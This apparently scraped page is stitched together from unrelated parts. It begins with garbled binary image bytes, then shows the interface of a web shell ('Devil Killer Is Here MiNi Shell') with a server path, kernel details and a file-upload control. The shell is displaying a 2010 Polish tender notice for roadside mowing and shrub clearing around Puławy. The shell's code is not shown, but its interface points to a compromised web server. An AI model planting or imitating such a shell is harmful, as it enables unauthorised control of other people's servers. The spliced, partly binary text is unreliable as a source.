JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100317/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100317/58495-N-2010.html

<p class="kh_header"><b>Puławy: Koszenie traw i chwastów, wycinka samosiejek oraz utrzymanie trawników położonych wzdłuż dróg wojewódzkich nr: 738, 741, 743, 747, 755, 759, 801, 817, 824, 825, 826, 830, 831, 832, 845, 851, 854, 855, 857, 860, 900</b><br>
<b>Numer ogłoszenia: 58495 - 2010; data zamieszczenia: 17.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Wojewódzkich w Lublinie - Rejon Dróg Wojewódzkich w Puławach , ul. Składowa 1A, 24-100 Puławy, woj. lubelskie, tel. 081 8863163, 8864103, faks 081 8863163.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdw.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Koszenie traw i chwastów, wycinka samosiejek oraz utrzymanie trawników położonych wzdłuż dróg wojewódzkich nr: 738, 741, 743, 747, 755, 759, 801, 817, 824, 825, 826, 830, 831, 832, 845, 851, 854, 855, 857, 860, 900.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi polegające na: 
Koszeniu traw i chwastów, wycince samosiejek oraz utrzymaniu trawników położonych wzdłuż dróg wojewódzkich nr 738, 741, 743, 747, 755, 759, 801, 817, 824, 825, 826, 830, 831, 832, 845, 851, 854, 855, 857, 860, 900. 
Usługą objęto:
Zadanie nr 1 - Koszenie traw i chwastów z poboczy dróg wojewódzkich nr 738, 741, 743, 801, 824, 826, 830, 832, 845, 860 na terenie Obwodu Drogowego w Puławach z wyłączeniem miast: Puławy, Nałęczów i Dęblin
Zakres usług obejmuje:
1)koszenie obustronne, w ciągu roku, w okresie od  kwietnia do września 2010 r. w maksymalnej ilości  220,48 ha;
2)usunięcie przed każdym koszeniem zanieczyszczeń takich jak kamienie, gruz, puszki, butelki itp. i wywiezienie ich na składowisko odpadów  
3)koszenie ręczne oraz z użyciem kosiarki(ek) bijakowej(ych) całej szerokości pasa drogowego, z uwzględnieniem poboczy, rowów, skarp, przeciwskarp oraz wykoszenie wlotów skrzyżowań z drogami o nawierzchni bitumicznej na dł. 20 m). Przyjęte szerokości koszenia zawiera załącznik I - przedmiar usług . 
4)ręczne koszenie w miejscach niedostępnych tj. przy słupkach znaków drogowych,  słupkach prowadzących, barierach energochłonnych itp. Zakres usługi obejmuje również wykoszenie do wymaganej szerokości terenu za barierami drogowymi
5)zapewnienie przez Wykonawcę bezpiecznych warunków ruchu drogowego w rejonie prowadzonych usług objętych umową na podstawie przekazanego przez Zamawiającego projektu czasowej organizacji ruchu, stanowiącego załącznik do niniejszej SIWZ
Wykonawca przystąpi do realizacji usług po protokolarnym przejęciu od Zamawiającego pasa drogowego. Termin rozpoczęcia koszenia, kolejność dróg, szczegółowy zakres oraz termin zakończenia zostanie każdorazowo określony przez Zamawiającego pisemną dyspozycją. 
Zamawiający zastrzega sobie możliwość zmniejszenia zakresu koszenia. 
Usługi należy wykonać zgodnie z opisem i Zasadami Realizacji Zamówienia w sposób  gwarantujący należytą jakość.
Zadanie nr 2 - Koszenie traw i chwastów z poboczy dróg wojewódzkich nr 747, 755, 759, 817, 824, 825, 854, 855, 857, 900 na terenie Obwodu Drogowego           w Annopolu z wyłączeniem miasta Opole Lubelskie
Zakres usług obejmuje:
1)koszenie obustronne w ciągu roku w okresie od  kwietnia do września 2010 r. w maksymalnej ilości  214,68 ha;
2) usunięcie przed każdym koszeniem zanieczyszczeń takich jak kamienie, gruz, puszki, butelki itp. i wywiezienie ich na składowisko odpadów  
3)koszenie ręczne oraz z użyciem kosiarki(ek) bijakowej(ych) całej szerokości pasa drogowego, z uwzględnieniem poboczy, rowów, skarp, przeciwskarp oraz wykoszenie wlotów skrzyżowań z drogami o nawierzchni bitumicznej na dł. 20 m). Przyjęte szerokości koszenia zawiera załącznik I - przedmiar usług . 
4)ręczne koszenie w miejscach niedostępnych tj. przy słupkach znaków drogowych,  słupkach prowadzących, barierach energochłonnych itp. Zakres usługi obejmuje również wykoszenie do wymaganej szerokości terenu za barierami drogowymi
5) Zapewnienie przez Wykonawcę bezpiecznych warunków ruchu drogowego w rejonie prowadzonych usług objętych umową na podstawie przekazanego przez Zamawiającego projektu czasowej organizacji ruchu, stanowiącego załącznik do niniejszej SIWZ
Wykonawca przystąpi do realizacji usług po protokolarnym przejęciu od Zamawiającego pasa drogowego. Termin rozpoczęcia koszenia, kolejność dróg, szczegółowy zakres oraz termin zakończenia zostanie każdorazowo określony przez Zamawiającego pisemną dyspozycją. 
Zamawiający zastrzega sobie możliwość zmniejszenia zakresu koszenia. 
Usługi należy wykonać zgodnie z opisem i Zasadami Realizacji Zamówienia              w sposób  gwarantujący należytą jakość.
Zadanie nr 3 - Utrzymanie trawników położonych wzdłuż dróg wojewódzkich nr 801, 824 i 851 na terenie miasta Puławy
Zakres usług obejmuje:
1)Koszenie trawników wraz z  wygrabieniem skoszonej trawy i wywozem jej na składowisko odpadów - sześciokrotnie w okresie kwiecień - wrzesień 2010 na powierzchni 5,51 ha;
2)Jednokrotne  wiosenne  porządkowe wygrabienie trawników z wywozem wygrabionych nieczystości i resztek roślin na składowisko odpadów   w m-cu kwietniu 2010 na powierzchni 5,51 ha; 
3)Dwukrotne jesienne porządkowe grabienie  trawników w wywozem wygrabionych liści, nieczystości i resztek roślin na składowisko odpadów w okresie  wrzesień - listopad 2010  na powierzchni  5,51 ha;
4)Dwudziestokrotne zebranie śmieci i nieczystości z terenu trawników z wywiezieniem ich na składowisko odpadów w okresie kwiecień - listopad 2010r.
5)Zapewnienie przez Wykonawcę bezpiecznych warunków ruchu drogowego w rejonie prowadzonych usług objętych umową na podstawie przekazanego przez Zamawiającego projektu czasowej organizacji ruchu, stanowiącego załącznik do niniejszej SIWZ
6) Wykaz powierzchni na poszczególnych ulicach przedstawia załącznik I - przedmiar usług
Wykonawca przystąpi do realizacji usług po protokolarnym przejęciu od Zamawiającego pasa drogowego. Termin rozpoczęcia usługi, oraz termin zakończenia zostanie każdorazowo określony przez Zamawiającego pisemną dyspozycją. 
Zamawiający zastrzega sobie możliwość:
a) zmniejszenia krotności poszczególnych usług,
b) przesunięcia ilości usług między asortymentami
Usługi należy wykonać zgodnie z opisem i Zasadami Realizacji Zamówienia w sposób  gwarantujący należytą jakość.
Zadanie nr 4 - Utrzymanie trawników położonych wzdłuż dróg wojewódzkich  nr 826 i 830 na terenie miasta Nałęczów
Zakres usług obejmuje:
1)Koszenie trawników wraz z  wygrabieniem skoszonej trawy i wywozem jej na składowisko odpadów - sześciokrotnie w okresie kwiecień - wrzesień 2010 na powierzchni 3,18 ha;
2)Jednokrotne  wiosenne  porządkowe wygrabienie trawników z wywozem wygrabionych nieczystości i resztek roślin na składowisko odpadów  w m-cu kwietniu 2010 na powierzchni 3,18 ha; 
3)Dwukrotne jesienne porządkowe grabienie  trawników w wywozem wygrabionych liści, nieczystości i resztek roślin na składowisko odpadów w okresie  wrzesień - listopad 2010  na powierzchni  3,18 ha;
4)Dwudziestokrotne zebranie śmieci i nieczystości z terenu trawników                  z wywiezieniem ich na składowisko odpadów w okresie kwiecień-listopad 2010r.
5)Zapewnienie przez Wykonawcę bezpiecznych warunków ruchu drogowego w rejonie prowadzonych usług objętych umową na podstawie przekazanego przez Zamawiającego projektu czasowej organizacji ruchu, stanowiącego załącznik do niniejszej SIWZ
6)Wykaz powierzchni na poszczególnych ulicach przedstawia załącznik - przedmiar usług
Wykonawca przystąpi do realizacji usług po protokolarnym przejęciu od zamawiającego pasa drogowego. Termin rozpoczęcia usługi, oraz termin zakończenia zostanie każdorazowo określony przez Zamawiającego pisemną dyspozycją. 
Zamawiający zastrzega sobie możliwość:
a) zmniejszenia krotności poszczególnych usług
b) przesunięcia ilości usług między asortymentami
Usługi należy wykonać zgodnie z opisem i Zasadami Realizacji Zamówienia              w sposób  gwarantujący należytą jakość.
Zadanie nr 5 - Utrzymanie trawników położonych wzdłuż dróg wojewódzkich  nr 801 i 831 na terenie miasta Dęblin
Zakres usług obejmuje:
1)Koszenie trawników wraz z  wygrabieniem skoszonej trawy i wywozem jej na składowisko odpadów - sześciokrotnie w okresie kwiecień - wrzesień 2010 na powierzchni 1,90 ha;
2)Jednokrotne  wiosenne  porządkowe wygrabienie trawników z wywozem wygrabionych nieczystości i resztek roślin na składowisko odpadów   w m-cu kwietniu 2010 na powierzchni 1,90 ha; 
3)Dwukrotne jesienne porządkowe grabienie  trawników w wywozem wygrabionych liści, nieczystości i resztek roślin na składowisko odpadów   w okresie  wrzesień - listopad 2010  na powierzchni  1,90 ha;
4)Dwudziestokrotne zebranie śmieci i nieczystości z terenu trawników z wywiezieniem ich na składowisko odpadów w okresie kwiecień - listopad 2010r.
5)Zapewnienie przez Wykonawcę bezpiecznych warunków ruchu drogowego w rejonie prowadzonych usług objętych umową na podstawie przekazanego przez Zamawiającego projektu czasowej organizacji ruchu, stanowiącego załącznik do niniejszej SIWZ
6) Wykaz powierzchni na poszczególnych ulicach przedstawia załącznik - przedmiar usług
Wykonawca przystąpi do realizacji usług po protokolarnym przejęciu od Zamawiającego pasa drogowego. Termin rozpoczęcia usługi, oraz termin zakończenia zostanie każdorazowo określony przez Zamawiającego pisemną dyspozycją. 
Zamawiający zastrzega sobie możliwość:
a) zmniejszenia krotności poszczególnych usług,
b) przesunięcia ilości usług między asortymentami
Usługi należy wykonać zgodnie z opisem i Zasadami Realizacji Zamówienia w sposób  gwarantujący należytą jakość.
Zadanie nr 6 - wycinka samosiejek rosnących wzdłuż dróg wojewódzkich nr 747, 824 i 825 na terenie Obwodu Drogowego w Annopolu
Zakres usług obejmuje wycinkę samosiejek na drogach : a) nr 825 odc. Kamień - Józefów - na powierzchni 0,54 ha, przy zakrzewieniu - porośnięciu gęstym,        b) nr 824 odc. Józefów - Annopol - na powierzchni 1,55 ha , przy zakrzewieniu - porośnięciu gęstym, c) nr 747 odc. Kamień - Opole Lubelskie - na powierzchni 0,69 ha, przy zakrzewieniu - porośnięciu gęstym 
Usługi polegać będą na:
1)Wycince krzewów i samosiejek na wskazanych odcinkach dróg, na całej szerokości pasa drogowego, z uwzględnieniem poboczy, skarp, rowów oraz przeciwskarp; szczegółowy wykaz odcinków objętych usługą zawiera załącznik - przedmiar usług  
2)uprzątnięciu z pasa drogowego wyciętych krzaków i samosiejek, które stanowią własność Wykonawcy poprzez rozdrobnienie w rębakach lub wywóz na składowisko odpadów,   
3)realizacji prac zgodnie z opisem i Zasadami Realizacji Zamówienia 
4)zapewnieniu, w rejonie prowadzonych prac bezpiecznych warunków ruchu  drogowego i pieszego zgodnie z zatwierdzonym projektem czasowej organizacji ruchu, przekazanym przez Zamawiającego 
Zamawiający zastrzega sobie możliwość zmniejszenia ilości usług,
1.Szczegółowy obmiar prac objętych usługą zawiera załącznik Przedmiar usług.
2.Zamawiający dopuszcza możliwość składania ofert częściowych na pojedyncze zadania. Wykonawca może złożyć ofertę na wykonanie jednego lub więcej zadań, wybranych przez siebie spośród zadań objętych zamówieniem. Całkowita szacunkowa wartość zamówienia:458835,86 zł netto.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 77.31.20.00-0, 77.31.41.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy zamówienia</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli Wykonawca wykaże, że w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje minimum 1 usługę polegającą na:
a)w przypadku składania oferty na zadania nr 1 lub 2 - koszeniu  poboczy dróg, nasypów, skarp, przeciwskarp, rowów przydrożnych, pasów drogowych, wałów ochronnych o wartości minimum 25 000,00 zł brutto
b)w przypadku składania oferty na zadania  nr 3, 4 lub 5 - koszeniu trawników lub terenów wymienionych w pkt.a o wartości minimum 3 000,00 zł brutto 
c)w przypadku składania oferty na zadanie nr 6 - wycince krzewów lub samosiejek o wartości minimum 10 000,00 zł brutto</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania potencjałem technicznym zostanie spełniony, jeśli:
a) w przypadku składania oferty na zadania nr 1 lub 2 -  Wykonawca wykaże, iż na czas realizacji zamówienia będzie dysponował przynajmniej jedną (1szt.) kosiarką bijakową doczepną lub na wysięgniku wraz z nośnikiem oraz kosami spalinowymi w ilości co najmniej 5 szt;
b)w przypadku składania oferty na zadania nr 3, 4 lub 5 -  Wykonawca wykaże, iż na czas realizacji zamówienia będzie dysponował przynajmniej trzema (3 szt.) kosiarkami spalinowymi oraz co najmniej 2 szt. kos spalinowych, a także przynajmniej jednym (1 szt) ciągnikiem z przyczepą przystosowaną do wywozu trawy i liści. 
c)w przypadku składania oferty na zadanie nr 6 -  Wykonawca wykaże, iż na czas realizacji zamówienia będzie dysponował przynajmniej 4 szt. pił mechanicznych oraz samochodem ciężarowym o ładowności powyżej 3,5 tony lub ciągnikiem z przyczepą 
d)w przypadku składania oferty na więcej niż jedno zadanie Wykonawca, wykaże, iż na czas realizacji zamówienia będzie dysponował  jednostkami sprzętowymi i urządzeniami  wymaganymi dla realizacji wybranych zadań  w ilości co najmniej: ciągnik z przyczepą przystosowaną do wywozu liści i trawy - 1 szt, kosiarka bijakowa doczepna lub na wysięgniku wraz z nośnikiem - 1 szt, kosy spalinowe - 5 szt, kosiarki spalinowe - 4 szt, piły mechaniczne  - 4 szt, samochód ciężarowy o ładowności pow. 3,5 tony lub ciągnik z przyczepą - 1szt</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania osobami zdolnymi do wykonania zamówienia zostanie spełniony, jeżeli Wykonawca przedstawi wykaz osób wyznaczonych do realizacji zamówienia w ilości zapewniającej obsługę sprzętu wymaganego przez Zamawiającego, w zależności od wybranego (ych) zadań:</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)Ofertę przetargową z ceną netto i podatkiem VAT 2)formularz -Załącznik do oferty 3)Wykaz części zamówienia, których wykonanie Wykonawca zamierza zlecić Podwykonawcom 4)W przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia do oferty należy załączyć dokument ustanawiający pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego zgodnie z art.. 23 ust. 1 i 2 ustawy Prawo Zamówień Publicznych. 
5) W przypadku podpisania oferty i innych dokumentów przez osobę)osoby, które nie są wymienione w odpisie z właściwego Rejestru do oferty należy załączyć dokument potwierdzający prawo do reprezentowania podmiotu przez osobę)osoby podpisujące ofertę.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ebip.lublin.pl/zdw<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego w pok. 11 lub pocztą elektroniczną po przesłaniu zamówienia na adres rdw.pulawy@zdw.lublin.pl. Cena SIWZ odbieranej od Zamawiającego w formie papierowej - 10,00 zł brutto..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.03.2010 godzina 09:00, miejsce: Rejon Dróg Wojewódzkich w PUławach, ul. Składowa 1a,24-100 Puławy,pok. nr 12.Otwarcie ofert nastąpi w dniu 25.03.2010 o godz. 9:30 w pok nr 11..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Niniejsze postępowanie jest prowadzone w języku polskim.
Oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazują za pomocą faksu nr 081 886 31 63 lub drogą elektroniczną na adres       e-mail: rdw.pulawy@zdw.lublin.pl.
Jeżeli Zamawiający lub Wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje faksem lub drogą elektroniczną, każda ze stron na żądanie drugiej  niezwłocznie potwierdza fakt ich otrzymania.
W przypadku braku potwierdzenia otrzymania wiadomości przez Wykonawcę, Zamawiający domniema, iż pismo wysłane przez Zamawiającego na numer faksu lub adres e-mail podany przez Wykonawcę zostało mu doręczone w sposób umożliwiający zapoznanie się Wykonawcy z treścią pisma.
Osoby uprawnione do porozumiewania się z Wykonawcami:
1)W sprawach technicznych - Tomasz Kwiatkowski ( 81 886 31 63)
2)W sprawach formalno - prawnych związanych z postępowaniem o udzielenie zamówienia i zawarciem umowy - Artur Wiak ( 81 886 31 63)
UWAGA:
Wykonawcy, którzy uzyskają niniejszą specyfikację ze strony internetowej Zamawiającego lub w inny sposób i zamierzają ubiegać się o udzielenie zamówienia, proszeni są o przesłanie krótkiej informacji faksem na nr 081 886 31 63 lub pocztą elektroniczna na adres: rdw.pulawy@zdw.lublin.pl , zawierającej podstawowe dane firmy (nazwę, adres, nr telefonu i faksu, adres poczty elektronicznej). 
Wykonawcy, którzy zgłoszą w ten sposób zamiar ubiegania się o udzielenie zamówienia, będą przez Zamawiającego indywidualnie (bezpośrednio) zawiadamiani o np. zapytaniach, wyjaśnieniach i zmianach dotyczących specyfikacji istotnych warunków zamówienia, zwołaniu przez Zamawiającego zebrania wszystkich Wykonawców, przedłużeniu terminu składania ofert..</p>
